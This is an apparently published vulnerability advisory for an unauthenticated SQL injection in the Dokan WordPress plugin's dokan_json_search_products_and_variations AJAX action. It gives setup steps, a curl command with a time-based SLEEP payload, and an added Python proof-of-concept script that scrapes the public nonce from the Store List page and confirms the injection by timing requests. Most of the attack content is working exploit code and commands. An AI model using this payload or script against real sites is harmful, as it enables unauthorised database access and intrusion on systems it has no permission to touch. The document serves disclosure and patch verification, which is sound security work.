The plugin does not properly sanitise and escape the user_ids parameter of the dokan_json_search_products_and_variations AJAX action before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
Setup:
- Install WooCommerce (dependency, no setup required)
- Install the plugin and complete the wizard (no special configuration was performed; all defaults were accepted)

Attack:
- As an unauthenticated user, access the "Store List" page (default at /store-listing/) and extract the "search_products_nonce" value from the page source
- Invoke the following curl command (with the extracted nonce in place) to induce a five second sleep:

time curl "https://example.com/wp-admin/admin-ajax.php?action=dokan_json_search_products_and_variations&security=<NONCE-HERE>&term=x&user_ids='+AND+(SELECT+5362+FROM+(SELECT(SLEEP(5)))yWDg)--+qXby"

Note that the nonce is served to unauthenticated visitors, so it does not act as an authorisation check: the request above runs without any session or login.
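The attack steps above can be automated end to end: fetch the Store List page, pull the nonce out of the source, issue a baseline request with SLEEP(0) and a delayed request with SLEEP(5), and compare the timings. The script below is an added example written for this page, not code from the advisory or the plugin. It assumes the nonce appears in the page source as a 10-character hex value next to the string search_products_nonce (as a JSON key or an attribute); the regular expression and the 0.9 timing tolerance are assumptions, and the sample HTML in the test is constructed.

```python
import re
import sys
import time
import urllib.parse
import urllib.request
from typing import Optional

# Assumption: the nonce is emitted as "search_products_nonce":"<10 hex chars>"
# (wp_localize_script JSON) or search_products_nonce="<10 hex chars>" (attribute).
NONCE_RE = re.compile(r'search_products_nonce["\']?\s*[:=]\s*["\']([0-9a-f]{10})["\']')

AJAX_PATH = "/wp-admin/admin-ajax.php"
STORE_LIST_PATH = "/store-listing/"


def extract_nonce(html: str) -> Optional[str]:
    """Return the search_products_nonce found in the page source, or None."""
    m = NONCE_RE.search(html)
    return m.group(1) if m else None


def sleep_payload(delay: int) -> str:
    """Same shape as the advisory's PoC: close the string literal, AND in a
    subquery that sleeps, then comment out the rest of the statement."""
    return f"' AND (SELECT 5362 FROM (SELECT(SLEEP({delay})))yWDg)-- qXby"


def build_url(base: str, nonce: str, delay: int) -> str:
    """Build the admin-ajax.php URL for the vulnerable action with a sleeping user_ids."""
    params = {
        "action": "dokan_json_search_products_and_variations",
        "security": nonce,
        "term": "x",
        "user_ids": sleep_payload(delay),
    }
    return base.rstrip("/") + AJAX_PATH + "?" + urllib.parse.urlencode(params)


def timed_get(url: str, timeout: float = 30.0) -> float:
    """Fetch the URL and return the wall-clock seconds the request took."""
    start = time.monotonic()
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        resp.read()
    return time.monotonic() - start


def looks_injectable(baseline: float, delayed: float, delay: int) -> bool:
    """Only flag the target when the SLEEP(delay) request took roughly `delay`
    seconds longer than the SLEEP(0) baseline, so ordinary latency does not
    produce a false positive (0.9 tolerance is an assumption)."""
    return delayed - baseline >= delay * 0.9


def main(base: str, delay: int = 5) -> int:
    page = urllib.request.urlopen(base.rstrip("/") + STORE_LIST_PATH).read()
    nonce = extract_nonce(page.decode("utf-8", errors="replace"))
    if nonce is None:
        print("nonce not found in Store List page source")
        return 2
    baseline = timed_get(build_url(base, nonce, 0))
    delayed = timed_get(build_url(base, nonce, delay))
    print(f"nonce={nonce} baseline={baseline:.2f}s delayed={delayed:.2f}s")
    if looks_injectable(baseline, delayed, delay):
        print("time-based SQL injection confirmed")
        return 0
    print("no measurable delay; target may be patched")
    return 1


if __name__ == "__main__":
    # Usage: python poc.py https://example.com
    sys.exit(main(sys.argv[1]))
```

The baseline request uses the same injection shape with SLEEP(0) so that the comparison isolates the sleep itself from the cost of the query and the round trip; a single timed request, as in the curl one-liner, is quicker to read but cannot tell a slow server from a sleeping one.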
cydave
Yes
2022-11-21